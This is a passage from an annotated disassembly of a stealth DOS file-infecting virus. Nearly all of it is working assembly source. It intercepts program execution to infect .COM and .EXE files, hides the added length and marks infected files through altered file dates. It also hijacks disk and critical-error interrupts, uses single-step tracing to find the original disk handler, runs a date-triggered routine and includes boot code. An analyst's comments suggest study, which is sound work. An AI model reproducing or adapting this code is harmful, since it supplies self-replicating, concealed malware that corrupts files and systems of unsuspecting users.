		jmp	loc_10			; (030F)

;
;			       SUBROUTINE
;

sub_3		proc	near
		push	es
		mov	ah,2Fh			; '/'
		call	sub_24			; INT 21
		push	es
		pop	ds
		pop	es
		retn
sub_3		endp

_21_4B: 	or	al,al			; Zero ?
		jz	loc_29			; Jump if zero
		jmp	loc_36			; (06E0)
loc_29:
		push	ds
		push	dx
		mov	cs:prm_blck_adr,bx	; (CS:1224) save EXEC block offset
		mov	word ptr cs:prm_blck_adr+2,es ; (CS:1226) save EXEC block segment
		lds	si,dword ptr cs:prm_blck_adr  ; (CS:1224) Load EXEC block address
		mov	di,offset exec_block	 ; (CS:12F1)
		mov	cx,0Eh
		push	cs
		pop	es
		rep	movsb			; Save EXEC param block
		pop	si
		pop	ds
		mov	di,offset file_name	; (CS:1307)
		mov	cx,50h
		rep	movsb			; Save file name
		mov	bx,0FFFFh
		call	sub_23			; (0E3A)
		call	sub_19			; Restore REGS
		pop	bp
		pop	cs:data_98		; (CS:12E6=0)
		pop	cs:data_99		; (CS:12E8=0)
		pop	cs:data_85		; (CS:12B3=0)
		mov	ax,4B01h
		push	cs
		pop	es
		mov	bx,offset exec_block
		pushf				; Push flags
		call	dword ptr cs:ptr_INT_21 ; (CS:1235=0)
		jnc	loc_30			; Jump if carry=0
		or	cs:data_85,1		; (CS:12B3=0)
		push	cs:data_85		; (CS:12B3=0)
		push	cs:data_99		; (CS:12E8=0)
		push	cs:data_98		; (CS:12E6=0)
		push	bp
		mov	bp,sp
		les	bx,dword ptr cs:prm_blck_adr ; (CS:1224=0) Load 32 bit ptr
		jmp	loc_11			; (033F)
loc_30:
		call	sub_9			; Get PSP segment
		push	cs
		pop	es
		mov	di,offset data_75	; (CS:1252=0)
		mov	cx,14h
loc_31:
		mov	ax,cs:data_77		; (CS:12A3=0)
		repne	scasw			; Rep zf=0+cx >0 Scan es:[di] for ax
		jnz	loc_32			; Jump if not zero
		mov	word ptr es:[di-2],0
		inc	cs:data_76		; (CS:12A2=0)
		jmp	short loc_31		; (060B)
loc_32:
		lds	si,cs:entry_point	; (CS:1303=0) Load 32 bit ptr
		cmp	si,1			; already infected?
		jne	loc_33			; Jump if not equal
		mov	dx,word ptr ds:data_29+2 ; (0000:001A) - original entry point segment
		add	dx,10h
		mov	ah,51h
		call	sub_24			; INT 21 - get PSP segment
		add	dx,bx
		mov	word ptr cs:entry_point+2,dx ; (CS:1305=0)
		push	word ptr ds:data_29	; (0000:0018) - original entry point offset
		pop	word ptr cs:entry_point ; (CS:1303=0)
		add	bx,10h
		add	bx,ds:data_27		; (0000:0012) - original SS:
		mov	cs:data_107,bx		; (CS:1301=0)
		push	word ptr ds:data_28	; (0000:0014) - original SP
		pop	cs:data_106		; (CS:12FF=0)
		jmp	short loc_34		; (067F)
loc_33:
		mov	ax,[si]
		add	ax,[si+2]
		add	ax,[si+4]
		jz	loc_35			; Jump if zero
		push	cs
		pop	ds
		mov	dx,offset file_name
		call	sub_8			; (0925)
		call	sub_10			; (097E)
		inc	cs:data_103		; (CS:12EF=0)
		call	sub_4			; infect file
		dec	cs:data_103		; (CS:12EF=0)
loc_34:
		mov	ah,51h
		call	sub_24			; INT 21
		call	sub_21			; Save REGS in vir's stack
		call	sub_16			; (0D9B)
		call	sub_18			; (0DBA)
		call	sub_20			; Restore REGS from vir's stack
		mov	ds,bx
		mov	es,bx
		push	cs:data_85		; (CS:12B3=0)
		push	cs:data_99		; (CS:12E8=0)
		push	cs:data_98		; (CS:12E6=0)
		pop	word ptr ds:PSP_0A	; offset 0A in PSP
		pop	word ptr ds:PSP_0A+2	; offset 0C in PSP
		push	ds
		lds	dx,dword ptr ds:PSP_0A	; offset 0A in PSP - terminate address
		mov	al,22h
		call	sub_27			; Set INT 22 vector
		pop	ds
		popf				; Pop flags
		pop	ax
		mov	ss,cs:data_107		; (CS:1301=0)
		mov	sp,cs:data_106		; (CS:12FF=0)
		jmp	dword ptr cs:entry_point ; (CS:1303=0)
loc_35:
		mov	bx,[si+1]
		mov	ax,ds:[bx+si+sav_file]	 ; (0000:FD9F)
		mov	[si],ax
		mov	ax,ds:[bx+si+sav_file+2] ; (0000:FDA1)
		mov	[si+2],ax
		mov	ax,ds:[bx+si+sav_file+4] ; (0000:FDA3)
		mov	[si+4],ax
		jmp	short loc_34		; (067F)
loc_36:
		cmp	al,1
		je	loc_37			; Jump if equal
		jmp	loc_10			; (030F)
loc_37:
		or	cs:data_85,1		; (CS:12B3=0)
		mov	cs:prm_blck_adr,bx	; (CS:1224=0)
		mov	word ptr cs:prm_blck_adr+2,es ; (CS:1226=7DBDh)
		call	sub_19			; Restore REGS
		call	sub_24			; INT 21
		call	sub_17			; Save REGS
		les	bx,dword ptr cs:prm_blck_adr	; (CS:1224) Load EXEC param block address
		lds	si,dword ptr es:[bx+12h]	; Load CS:IP from EXEC parameter block
		jc	loc_40				; Jump if carry Set
		and	byte ptr cs:data_85,0FEh	; (CS:12B3=0)
		cmp	si,1			; infected .EXE ?
		je	loc_38			; Jump if equal
		mov	ax,[si]
		add	ax,[si+2]
		add	ax,[si+4]
		jnz	loc_39			; Jump if not zero
		mov	bx,[si+1]
		mov	ax,ds:[bx+si+sav_file]	; (013B:FD9F) saved original file
		mov	[si],ax
		mov	ax,ds:[bx+si+sav_file+2] ; (013B:FDA1) saved original file
		mov	[si+2],ax
		mov	ax,ds:[bx+si+sav_file+4] ; (013B:FDA3) saved original file
		mov	[si+4],ax
		jmp	short loc_39		; (0765)
loc_38:
		mov	dx,word ptr ds:data_29+2	; (013B:001A=2E09h)
		call	sub_9			; Get PSP segment
		mov	cx,cs:data_77		; (CS:12A3) - PSP segment
		add	cx,10h
		add	dx,cx
		mov	es:[bx+14h],dx
		mov	ax,word ptr ds:data_29	; (013B:0018=7332h)
		mov	es:[bx+12h],ax
		mov	ax,ds:data_27		; (013B:0012=2E08h)
		add	ax,cx
		mov	es:[bx+10h],ax
		mov	ax,ds:data_28		; (013B:0014=3E80h)
		mov	es:[bx+0Eh],ax
loc_39:
		call	sub_9			; Get PSP segment
		mov	ds,cs:data_77		; (CS:12A3=0)
		mov	ax,[bp+2]
		mov	ds:PSP_0A,ax		; (0000:000A=0F000h)
		mov	ax,[bp+4]
		mov	word ptr ds:PSP_0A+2,ax ; (0000:000C=7F6h)
loc_40:
		jmp	loc_13			; (0396)
_21_30: 	mov	byte ptr cs:data_104,0	; (CS:12F0=0)
		mov	ah,2Ah
		call	sub_24			; INT 21
		cmp	dx,916h
		jb	loc_41			; Jump if below
		call	sub_28			; (0FB2)
loc_41:
		jmp	loc_10			; (030F)

;
;		     SUBROUTINE - INFECTION
;

sub_4		proc	near
		call	sub_13			; (0CC6)
		call	sub_5			; (0855)
		mov	byte ptr data_31,1	; (CS:0020=0)
		cmp	data_38,5A4Dh		; (CS:1200=0)
		je	loc_42			; Jump if equal
		cmp	data_38,4D5Ah		; (CS:1200=0)
		je	loc_42			; Jump if equal
		dec	byte ptr data_31	; (CS:0020=0)
		jz	loc_45			; Jump if zero
loc_42:
; .EXE file infect
		mov	ax,data_41		; (CS:1204=0)
		shl	cx,1			; Shift w/zeros fill
		mul	cx			; dx:ax = reg * ax
		add	ax,200h
		cmp	ax,si
		jb	loc_44			; Jump if below
		mov	ax,data_43		; (CS:120A=0)
		or	ax,data_44		; (CS:120C=0)
		jz	loc_44			; Jump if zero
		mov	ax,data_80		; (CS:12A9=0)
		mov	dx,data_81		; (CS:12AB=0)
		mov	cx,200h
		div	cx			; ax,dx rem=dx:ax/reg
		or	dx,dx			; Zero ?
		jz	loc_43			; Jump if zero
		inc	ax
loc_43:
		mov	data_41,ax		; (CS:1204=0)
		mov	data_40,dx		; (CS:1202=0)
		cmp	data_48,1		; (CS:1214=0)
		je	loc_46			; Jump if equal
		mov	data_48,1		; (CS:1214=0)
		mov	ax,si
		sub	ax,data_42		; (CS:1208=0)
		mov	data_49,ax		; (CS:1216=0)
		add	data_41,8		; (CS:1204=0)
		mov	data_45,ax		; (CS:120E=0)
		mov	data_46,1000h		; (CS:1210=0) BUG BUG BUG!!!
						; When .EXE file is infected,
						; the end of the virus wil be
						; damaged. (sp = 1000)
		call	sub_6			; (08B3)
loc_44:
		jmp	short loc_46		; (084C)
loc_45:
; .COM file infect
		cmp	si,0F00h		; file len in paragraphs
		jae	loc_46			; Jump if above or =
		mov	ax,data_38		; (CS:1200=0)
		mov	data_23,ax		; (CS:0004=20CDh)
		add	dx,ax
		mov	ax,data_40		; (CS:1202=0)
		mov	data_24,ax		; (CS:0006=340h)
		add	dx,ax
		mov	ax,data_41		; (CS:1204=0)
		mov	data_25,ax		; (CS:0008=50C6h)
		add	dx,ax
		jz	loc_46			; Jump if zero - allready infected
		mov	cl,0E9h
		mov	byte ptr data_38,cl	; (CS:1200=0)
		mov	ax,10h
		mul	si			; dx:ax = reg * ax
		add	ax,265h
		mov	word ptr data_38+1,ax	; (CS:1201=0)
		mov	ax,data_38		; (CS:1200=0)
		add	ax,data_40		; (CS:1202=0)
		neg	ax
		mov	data_41,ax		; (CS:1204=0)
		call	sub_6			; (08B3)
loc_46:
		mov	ah,3Eh			; '>'
		call	sub_24			; INT 21
		call	sub_14			; (0D6C)
		retn
sub_4		endp


;
;			       SUBROUTINE
;

sub_5		proc	near
		push	cs
		pop	ds
		mov	ax,5700h
		call	sub_24			; INT 21
		mov	data_53,cx		; (CS:1229=0)
		mov	data_54,dx		; (CS:122B=0)
		mov	ax,4200h
		xor	cx,cx			; Zero register
		mov	dx,cx
		call	sub_24			; INT 21
		mov	ah,3Fh			; '?'
		mov	cl,1Ch
		mov	dx,1200h
		call	sub_24			; INT 21
		mov	ax,4200h
		xor	cx,cx			; Zero register
		mov	dx,cx
		call	sub_24			; INT 21
		mov	ah,3Fh			; '?'
		mov	cl,1Ch
		mov	dx,4
		call	sub_24			; INT 21
		mov	ax,4202h
		xor	cx,cx			; Zero register
		mov	dx,cx
		call	sub_24			; INT 21
		mov	data_80,ax		; (CS:12A9=0)
		mov	data_81,dx		; (CS:12AB=0)
		mov	di,ax
		add	ax,0Fh
		adc	dx,0
		and	ax,0FFF0h
		sub	di,ax
		mov	cx,10h
		div	cx			; ax,dx rem=dx:ax/reg
		mov	si,ax
		retn
sub_5		endp


;
;			       SUBROUTINE
;

sub_6		proc	near
		mov	ax,4200h
		xor	cx,cx			; Zero register
		mov	dx,cx
		call	sub_24			; INT 21
		mov	ah,40h
		mov	cl,1Ch
		mov	dx,1200h
		call	sub_24			; INT 21
		mov	ax,10h
		mul	si			; dx:ax = reg * ax
		mov	cx,dx
		mov	dx,ax
		mov	ax,4200h
		call	sub_24			; INT 21
		xor	dx,dx			; Zero register
		mov	cx,1000h
		add	cx,di
		mov	ah,40h
		call	sub_24			; INT 21
		mov	ax,5701h
		mov	cx,data_53		; (CS:1229=0)
		mov	dx,data_54		; (CS:122B=0)
		test	dh,80h
		jnz	loc_47			; Jump if not zero
		add	dh,0C8h
loc_47: 	call	sub_24			; INT 21
		cmp	byte ptr dos_ver,3	; (CS:12EE=0)
		jb	loc_ret_48		; Jump if below
		cmp	byte ptr data_103,0	; (CS:12EF=0)
		je	loc_ret_48		; Jump if equal
		push	bx
		mov	dl,data_52		; (CS:1228=0)
		mov	ah,32h
		call	sub_24			; INT 21
		mov	ax,cs:data_101		; (CS:12EC=0)
		mov	[bx+1Eh],ax
		pop	bx
loc_ret_48:
		retn
sub_6		endp


;
;			       SUBROUTINE
;

sub_7		proc	near
		call	sub_21			; Save REGS in vir's stack
		mov	di,dx
		add	di,0Dh
		push	ds
		pop	es
		jmp	short loc_50		; (0945)
sub_7		endp


;
;			       SUBROUTINE
;

sub_8		proc	near
		call	sub_21			; Save REGS in vir's stack - save REGS
		push	ds
		pop	es
		mov	di,dx
		mov	cx,50h
		xor	ax,ax			; Zero register
		mov	bl,0
		cmp	byte ptr [di+1],3Ah	; ':'
		jne	loc_49			; Jump if not equal
		mov	bl,[di]
		and	bl,1Fh
loc_49:
		mov	cs:data_52,bl		; (CS:1228=0)
		repne	scasb			; Rep zf=0+cx >0 Scan es:[di] for al
loc_50:
		mov	ax,[di-3]
		and	ax,0DFDFh
		add	ah,al
		mov	al,[di-4]
		and	al,0DFh
		add	al,ah
		mov	byte ptr cs:data_31,0	; (CS:0020=0)
		cmp	al,0DFh 		; file name is ....COM
		je	loc_51			; Jump if equal
		inc	byte ptr cs:data_31	; (CS:0020=0)
		cmp	al,0E2h 		; file name is ....EXE
		jne	loc_52			; Jump if not equal
loc_51:
		call	sub_20			; Restore regs from vir's stack
		clc				; Clear carry flag
		retn
loc_52:
		call	sub_20			; Restore regs from vir's stack
		stc				; Set carry flag
		retn
sub_8		endp


;
;			       SUBROUTINE
;

sub_9		proc	near
		push	bx
		mov	ah,51h
		call	sub_24			; INT 21
		mov	cs:data_77,bx		; (CS:12A3=0)
		pop	bx
		retn
sub_9		endp


;
;			       SUBROUTINE
;

sub_10		proc	near
		call	sub_13			; (0CC6)
		push	dx
		mov	dl,cs:data_52		; (CS:1228=0)
		mov	ah,36h			; '6'
		call	sub_24			; INT 21
		mul	cx			; dx:ax = reg * ax
		mul	bx			; dx:ax = reg * ax
		mov	bx,dx
		pop	dx
		or	bx,bx			; Zero ?
		jnz	loc_53			; Jump if not zero
		cmp	ax,4000h
		jb	loc_54			; Jump if below
loc_53:
		mov	ax,4300h
		call	sub_24			; INT 21
		jc	loc_54			; Jump if carry Set
		mov	di,cx
		xor	cx,cx			; Zero register
		mov	ax,4301h
		call	sub_24			; INT 21
		cmp	byte ptr cs:data_90,0	; (CS:12DA=0)
		jne	loc_54			; Jump if not equal
		mov	ax,3D02h
		call	sub_24			; INT 21
		jc	loc_54			; Jump if carry Set
		mov	bx,ax
		mov	cx,di
		mov	ax,4301h
		call	sub_24			; INT 21
		push	bx
		mov	dl,cs:data_52		; (CS:1228=0)
		mov	ah,32h			; '2'
		call	sub_24			; INT 21
		mov	ax,[bx+1Eh]
		mov	cs:data_101,ax		; (CS:12EC=0)
		pop	bx
		call	sub_14			; (0D6C)
		retn
loc_54:
		xor	bx,bx			; Zero register
		dec	bx
		call	sub_14			; (0D6C)
		retn
sub_10		endp


;
;			       SUBROUTINE
;

sub_11		proc	near
		push	cx
		push	dx
		push	ax
		mov	ax,4400h
		call	sub_24			; INT 21
		xor	dl,80h
		test	dl,80h
		jz	loc_55			; Jump if zero
		mov	ax,5700h
		call	sub_24			; INT 21
		test	dh,80h
loc_55:
		pop	ax
		pop	dx
		pop	cx
		retn
sub_11		endp


;
;			       SUBROUTINE
;

sub_12		proc	near
		call	sub_21			; Save REGS in vir's stack
		mov	ax,4201h
		xor	cx,cx			; Zero register
		xor	dx,dx			; Zero register
		call	sub_24			; INT 21
		mov	cs:data_78,ax		; (CS:12A5=0)
		mov	cs:data_79,dx		; (CS:12A7=0)
		mov	ax,4202h
		xor	cx,cx			; Zero register
		xor	dx,dx			; Zero register
		call	sub_24			; INT 21
		mov	cs:data_80,ax		; (CS:12A9=0)
		mov	cs:data_81,dx		; (CS:12AB=0)
		mov	ax,4200h
		mov	dx,cs:data_78		; (CS:12A5=0)
		mov	cx,cs:data_79		; (CS:12A7=0)
		call	sub_24			; INT 21
		call	sub_20			; Restore regs from vir's stack
		retn
sub_12		endp

_21_57: 	or	al,al			; Zero ?
		jnz	loc_58			; Jump if not zero
		and	cs:data_85,0FFFEh	; (CS:12B3=0)
		call	sub_19			; Restore REGS
		call	sub_24			; INT 21
		jc	loc_57			; Jump if carry Set
		test	dh,80h
		jz	loc_56			; Jump if zero
		sub	dh,0C8h
loc_56:
		jmp	loc_11			; (033F)
loc_57:
		or	cs:data_85,1		; (CS:12B3=0)
		jmp	loc_11			; (033F)
loc_58:
		cmp	al,1
		jne	loc_61			; Jump if not equal
		and	cs:data_85,0FFFEh	; (CS:12B3=0)
		test	dh,80h
		jz	loc_59			; Jump if zero
		sub	dh,0C8h
loc_59:
		call	sub_11			; (09E6)
		jz	loc_60			; Jump if zero
		add	dh,0C8h
loc_60:
		call	sub_24			; INT 21
		mov	[bp-4],ax
		adc	cs:data_85,0		; (CS:12B3=0)
		jmp	loc_13			; (0396)
_21_42: 	cmp	al,2
		jne	loc_61			; Jump if not equal
		call	sub_11			; (09E6)
		jz	loc_61			; Jump if zero
		sub	word ptr [bp-0Ah],1000h
		sbb	word ptr [bp-8],0
loc_61:
		jmp	loc_10			; (030F)
_21_3F: 	and	byte ptr cs:data_85,0FEh	; (CS:12B3=0)
		call	sub_11			; (09E6)
		jz	loc_61			; Jump if zero
		mov	cs:data_83,cx		; (CS:12AF=0)
		mov	cs:data_82,dx		; (CS:12AD=0)
		mov	cs:data_84,0		; (CS:12B1=0)
		call	sub_12			; (0A04)
		mov	ax,cs:data_80		; (CS:12A9=0)
		mov	dx,cs:data_81		; (CS:12AB=0)
		sub	ax,1000h
		sbb	dx,0
		sub	ax,cs:data_78		; (CS:12A5=0)
		sbb	dx,cs:data_79		; (CS:12A7=0)
		jns	loc_62			; Jump if not sign
		mov	word ptr [bp-4],0
		jmp	loc_25			; (0549)
loc_62:
		jnz	loc_63			; Jump if not zero
		cmp	ax,cx
		ja	loc_63			; Jump if above
		mov	cs:data_83,ax		; (CS:12AF=0)
loc_63:
		mov	dx,cs:data_78		; (CS:12A5=0)
		mov	cx,cs:data_79		; (CS:12A7=0)
		or	cx,cx			; Zero ?
		jnz	loc_64			; Jump if not zero
		cmp	dx,1Ch
		jbe	loc_65			; Jump if below or =
loc_64:
		mov	dx,cs:data_82		; (CS:12AD=0)
		mov	cx,cs:data_83		; (CS:12AF=0)
		mov	ah,3Fh			; '?'
		call	sub_24			; INT 21
		add	ax,cs:data_84		; (CS:12B1=0)
		mov	[bp-4],ax
		jmp	loc_13			; (0396)
loc_65:
		mov	si,dx
		mov	di,dx
		add	di,cs:data_83		; (CS:12AF=0)
		cmp	di,1Ch
		jb	loc_66			; Jump if below
		xor	di,di			; Zero register
		jmp	short loc_67		; (0B35)
loc_66:
		sub	di,1Ch
		neg	di
loc_67:
		mov	ax,dx
		mov	cx,cs:data_81		; (CS:12AB=0)
		mov	dx,cs:data_80		; (CS:12A9=0)
		add	dx,0Fh
		adc	cx,0
		and	dx,0FFF0h
		sub	dx,0FFCh
		sbb	cx,0
		add	dx,ax
		adc	cx,0
		mov	ax,4200h
		call	sub_24			; INT 21
		mov	cx,1Ch
		sub	cx,di
		sub	cx,si
		mov	ah,3Fh			; '?'
		mov	dx,cs:data_82		; (CS:12AD=0)
		call	sub_24			; INT 21
		add	cs:data_82,ax		; (CS:12AD=0)
		sub	cs:data_83,ax		; (CS:12AF=0)
		add	cs:data_84,ax		; (CS:12B1=0)
		xor	cx,cx			; Zero register
		mov	dx,1Ch
		mov	ax,4200h
		call	sub_24			; INT 21
		jmp	loc_64			; (0B04)
_21_40: 	and	byte ptr cs:data_85,0FEh	; (CS:12B3=0)
		call	sub_11			; (09E6)
		jnz	loc_68			; Jump if not zero
		jmp	loc_61			; (0AA2)
loc_68:
		mov	cs:data_83,cx		; (CS:12AF=0)
		mov	cs:data_82,dx		; (CS:12AD=0)
		mov	cs:data_84,0		; (CS:12B1=0)
		call	sub_12			; (0A04)
		mov	ax,cs:data_80		; (CS:12A9=0)
		mov	dx,cs:data_81		; (CS:12AB=0)
		sub	ax,1000h
		sbb	dx,0
		sub	ax,cs:data_78		; (CS:12A5=0)
		sbb	dx,cs:data_79		; (CS:12A7=0)
		js	loc_69			; Jump if sign=1
		jmp	short loc_71		; (0C47)
loc_69:
		call	sub_13			; (0CC6)
		push	cs
		pop	ds
		mov	dx,data_80		; (CS:12A9=0)
		mov	cx,data_81		; (CS:12AB=0)
		add	dx,0Fh
		adc	cx,0
		and	dx,0FFF0h
		sub	dx,0FFCh
		sbb	cx,0
		mov	ax,4200h
		call	sub_24			; INT 21
		mov	dx,4
		mov	cx,1Ch
		mov	ah,3Fh			; '?'
		call	sub_24			; INT 21
		mov	ax,4200h
		xor	cx,cx			; Zero register
		mov	dx,cx
		call	sub_24			; INT 21
		mov	dx,4
		mov	cx,1Ch
		mov	ah,40h			; '@'
		call	sub_24			; INT 21
		mov	dx,0F000h
		mov	cx,0FFFFh
		mov	ax,4202h
		call	sub_24			; INT 21
		mov	ah,40h			; '@'
		xor	cx,cx			; Zero register
		call	sub_24			; INT 21
		mov	dx,data_78		; (CS:12A5=0)
		mov	cx,data_79		; (CS:12A7=0)
		mov	ax,4200h
		call	sub_24			; INT 21
		mov	ax,5700h
		call	sub_24			; INT 21
		test	dh,80h
		jz	loc_70			; Jump if zero
		sub	dh,0C8h
		mov	ax,5701h
		call	sub_24			; INT 21
loc_70:
		call	sub_14			; (0D6C)
		jmp	loc_10			; (030F)
loc_71:
		jnz	loc_72			; Jump if not zero
		cmp	ax,cx
		ja	loc_72			; Jump if above
		jmp	loc_69			; (0BC9)
loc_72:
		mov	dx,cs:data_78		; (CS:12A5=0)
		mov	cx,cs:data_79		; (CS:12A7=0)
		or	cx,cx			; Zero ?
		jnz	loc_73			; Jump if not zero
		cmp	dx,1Ch
		ja	loc_73			; Jump if above
		jmp	loc_69			; (0BC9)
loc_73:
		call	sub_19			; Restore REGS
		call	sub_24			; INT 21
		call	sub_17			; Save REGS
		mov	ax,5700h
		call	sub_24			; INT 21
		test	dh,80h
		jnz	loc_74			; Jump if not zero
		add	dh,0C8h
		mov	ax,5701h
		call	sub_24			; INT 21
loc_74: 	jmp	loc_13			; (0396)
		jmp	loc_10			; (030F)

int_13: 	pop	word ptr cs:data_65	; (CS:1241=0)
		pop	word ptr cs:data_65+2	; (CS:1243=0)
		pop	cs:data_91		; (CS:12DB=0)
		and	cs:data_91,0FFFEh	; (CS:12DB=0)
		cmp	byte ptr cs:data_90,0	; (CS:12DA=0)
		jne	loc_75			; Jump if not equal
		push	cs:data_91		; (CS:12DB=0)
		call	dword ptr cs:old_INT	; (CS:122D=0)
		jnc	loc_76			; Jump if carry=0
		inc	cs:data_90		; (CS:12DA=0)
loc_75: 	stc				; Set carry flag
loc_76: 	jmp	dword ptr cs:data_65	; (CS:1241=0)

int_24: 	xor	al,al			; Zero register
		mov	byte ptr cs:data_90,1	; (CS:12DA=0)
		iret				; Interrupt return

;
;			       SUBROUTINE
;

sub_13		proc	near
		mov	byte ptr cs:data_90,0	; (CS:12DA=0)
		call	sub_21			; Save REGS in vir's stack
		push	cs
		pop	ds
		mov	al,13h
		call	sub_1			; Get INT 13 vector
		mov	word ptr old_INT,bx	; (CS:122D=0)
		mov	word ptr old_INT+2,es	; (CS:122F=70h)
		mov	word ptr old_INT_13,bx	; (CS:1239=0)
		mov	word ptr old_INT_13+2,es ; (CS:123B=70h)
		mov	dl,0
		mov	al,0Dh
		call	sub_1			; Get INT 0D vector
		mov	ax,es
		cmp	ax,0C000h
		jae	loc_77			; Jump if above or =
		mov	dl,2
loc_77:
		mov	al,0Eh
		call	sub_1			; Get INT 0E vector
		mov	ax,es
		cmp	ax,0C000h
		jae	loc_78			; Jump if above or =
		mov	dl,2
loc_78:
		mov	data_73,dl		; (CS:1250=0)
		call	sub_22			; Set INT 01 for debuging
		mov	data_92,ss		; (CS:12DD=151Ch)
		mov	data_93,sp		; (CS:12DF=0)
		push	cs
		mov	ax,offset loc_79
		push	ax
		mov	ax,70h
		mov	es,ax
		mov	cx,0FFFFh
		mov	al,0CBh
		xor	di,di			; Zero register
		repne	scasb			; Rep zf=0+cx >0 Scan es:[di] for al
		dec	di
		pushf				; Push flags
		push	es
		push	di
		pushf				; Push flags
		pop	ax
		or	ah,1
		push	ax
		in	al,21h			; port 21h, 8259-1 int IMR
		mov	data_97,al		; (CS:12E5=0)
		mov	al,0FFh
		out	21h,al			; port 21h, 8259-1 int comands
		popf				; Pop flags
		xor	ax,ax			; Zero register
		jmp	dword ptr old_INT	; (CS:122D=0)
loc_79:
		lds	dx,old_INT_1		; (CS:1231=0) Load 32 bit ptr
		mov	al,1
		call	sub_27			; Set INT 01 vector
		push	cs
		pop	ds
		mov	dx,offset int_13
		mov	al,13h
		call	sub_27			; Set INT 13 vector
		mov	al,24h
		call	sub_1			; Get INT 24 vector
		mov	word ptr old_INT_24,bx	; (CS:123D=0)
		mov	word ptr old_INT_24+2,es ; (CS:123F=70h)
		mov	dx,offset int_24
		mov	al,24h
		call	sub_27			; Set INT 24 vector
		call	sub_20			; Restore regs from vir's stack
		retn
sub_13		endp


;
;			       SUBROUTINE
;

sub_14		proc	near
		call	sub_21			; Save REGS in vir's stack
		lds	dx,dword ptr cs:old_INT_13 ; (CS:1239=0) Load 32 bit ptr
		mov	al,13h
		call	sub_27			; Set INT 13 vector
		lds	dx,dword ptr cs:old_INT_24 ; (CS:123D=0) Load 32 bit ptr
		mov	al,24h
		call	sub_27			; Set INT 24 vector
		call	sub_20			; Restore regs from vir's stack
		retn
sub_14		endp


;
;			       SUBROUTINE
;

sub_15		proc	near
		mov	ax,3300h		; Get CTRL-BREAK state
		call	sub_24			; INT 21
		mov	cs:data_94,dl		; (CS:12E1) save state
		mov	ax,3301h
		xor	dl,dl			; Set CTRL-BREAK = OFF
		call	sub_24			; INT 21
		retn
sub_15		endp


;
;			       SUBROUTINE
;

sub_16		proc	near
		mov	dl,cs:data_94		; (CS:12E1)
		mov	ax,3301h		; Restore CTRL-BREAK state
		call	sub_24			; INT 21
		retn
sub_16		endp


;
;			       SUBROUTINE
;

sub_17		proc	near
		pop	cs:data_100		; (CS:12EA=0)
		pushf				; Push flags
		push	ax
		push	bx
		push	cx
		push	dx
		push	si
		push	di
		push	ds
		push	es
		jmp	word ptr cs:data_100	; (CS:12EA=0)
sub_17		endp


;
;			       SUBROUTINE
;

sub_18		proc	near
		les	di,dword ptr cs:ptr_INT_21 ; (CS:1235=0) Load 32 bit ptr
		mov	si,offset data_70	   ; (CS:124B=0)
		push	cs
		pop	ds
		cld				   ; Clear direction
		mov	cx,5

locloop_80:
		lodsb				; String [si] to al
		xchg	al,es:[di]
		mov	[si-1],al
		inc	di
		loop	locloop_80		; Loop if cx > 0

		retn
sub_18		endp


;
;			       SUBROUTINE
;

sub_19		proc	near
		pop	cs:data_100		; (CS:12EA=0)
		pop	es
		pop	ds
		pop	di
		pop	si
		pop	dx
		pop	cx
		pop	bx
		pop	ax
		popf				; Pop flags
		jmp	word ptr cs:data_100	; (CS:12EA=0)

; External Entry into Subroutine 

sub_20:
		mov	cs:data_114,offset sub_19 ; (CS:135D=0) Restore REGS
		jmp	short loc_81		  ; (0DF6)

; External Entry into Subroutine 

sub_21:
		mov	cs:data_114,offset sub_17 ; (CS:135D=0) Save REGS
loc_81: 	mov	cs:data_112,ss		; (CS:1359=151Ch)
		mov	cs:data_111,sp		; (CS:1357=0)
		push	cs
		pop	ss
		mov	sp,cs:data_113		; (CS:135B=0)
		call	word ptr cs:data_114	; (CS:135D=0)
		mov	cs:data_113,sp		; (CS:135B=0)
		mov	ss,cs:data_112		; (CS:1359=151Ch)
		mov	sp,cs:data_111		; (CS:1357=0)
		retn
sub_19		endp


;
;			       SUBROUTINE
;

sub_22		proc	near
		mov	al,1
		call	sub_1			   ; Get INT 01 vector
		mov	word ptr cs:old_INT_1,bx   ; (CS:1231=0)
		mov	word ptr cs:old_INT_1+2,es ; (CS:1233=70h)
		push	cs
		pop	ds
		mov	dx,offset debug
		call	sub_27			   ; Set INT 01 vector
		retn
sub_22		endp

_21_48: 	call	sub_23		; (0E3A)
		jmp	loc_10		; (030F)

;
;			       SUBROUTINE
;

sub_23		proc	near
		cmp	byte ptr cs:data_95,0	; (CS:12E2=0)
		je	loc_ret_83		; Jump if equal
		cmp	bx,0FFFFh
		jne	loc_ret_83		; Jump if not equal
		mov	bx,160h
		call	sub_24			; INT 21
		jc	loc_ret_83		; Jump if carry Set
		mov	dx,cs
		cmp	ax,dx
		jb	loc_82			; Jump if below
		mov	es,ax
		mov	ah,49h
		call	sub_24			; INT 21
		jmp	short loc_ret_83	; (0E8A)
loc_82:
		dec	dx
		mov	ds,dx
		mov	word ptr ds:MCB_0001,0	; (7DBC:0001=275h)
		inc	dx
		mov	ds,dx
		mov	es,ax
		push	ax
		mov	cs:data_72,ax		; (CS:124E=7DBDh)
		xor	si,si			; Zero register
		mov	di,si
		mov	cx,all_len/2
		rep	movsw			; Rep when cx >0 Mov [si] to es:[di]
		dec	ax
		mov	es,ax
		mov	ax,cs:data_69		; (CS:1249=0)
		mov	es:MCB_0001,ax		; (48FF:0001=0FFFFh)
		mov	ax,offset loc_ret_83
		push	ax
		retf
loc_ret_83:	retn
sub_23		endp

_21_37: 	mov	byte ptr cs:data_104,2	; (CS:12F0=0)
		jmp	loc_10			; (030F)

;
;			       SUBROUTINE
;

sub_24		proc	near			; calls INT 21
		pushf
		call	dword ptr cs:ptr_INT_21 ; (CS:1235=0)
		retn
sub_24		endp

boot:		cli				; Disable interrupts
		xor	ax,ax			; Zero register
		mov	ss,ax
		mov	sp,7C00h
		jmp	short loc_85		; (0EF4)

data1		db	0dbh,0dbh,0dbh, 20h
data2		db	0f9h,0e0h,0e3h,0c3h
		db	 80h, 81h, 11h, 12h, 24h, 40h, 81h, 11h
		db	 12h, 24h, 40h,0F1h,0F1h, 12h, 24h, 40h
		db	 81h, 21h, 12h, 24h, 40h, 81h, 10h,0e3h
		db	0C3h, 80h, 00h, 00h, 00h, 00h, 00h, 00h
		db	 00h, 00h, 00h, 00h, 82h, 44h,0F8h, 70h
		db	0C0h, 82h, 44h, 80h, 88h,0C0h, 82h, 44h
		db	 80h, 80h,0C0h, 82h, 44h,0F0h, 70h,0C0h
		db	 82h, 28h, 80h, 08h,0C0h, 82h, 28h, 80h
		db	 88h, 00h,0F2h, 10h,0F8h, 70h,0C0h

loc_85: 	push	cs
		pop	ds
